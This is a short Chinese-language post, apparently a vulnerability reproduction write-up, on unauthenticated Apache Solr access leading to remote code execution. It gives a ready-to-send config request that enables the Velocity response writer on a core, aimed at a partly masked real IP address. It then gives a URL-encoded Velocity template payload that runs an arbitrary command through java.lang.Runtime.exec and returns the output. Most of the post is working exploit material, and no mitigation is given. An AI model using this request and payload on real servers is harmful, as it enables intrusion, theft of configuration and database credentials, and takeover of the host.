（2022年12月）Solr未授权访问导致getshell，任意代码执行_solr getshell

1、漏洞简介

Solr是一个高性能，采用Java开发，基于Lucene的全文搜索服务器。Solr的管理界面通常包含如下信息：solr的配置信息（包括路径，用户名，系统版本信息），数据库的配置信息（地址，用户名，密码），数据库搜索数据等。solr未授权访问的危害很大，轻则可查询所有数据库信息，重则可读取系统任意文件，设置getshell.

2、复现过程

先访问未授权访问地址

页面中有个Demo

构造如下请求包，进行发送

POST /solr/demo/config HTTP/1.1
Host: XXX.XXX.230.165:42302
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

访问了之后使用如下payload可直接执行任意代码

/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27pwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
1

方框处可以执行任意代码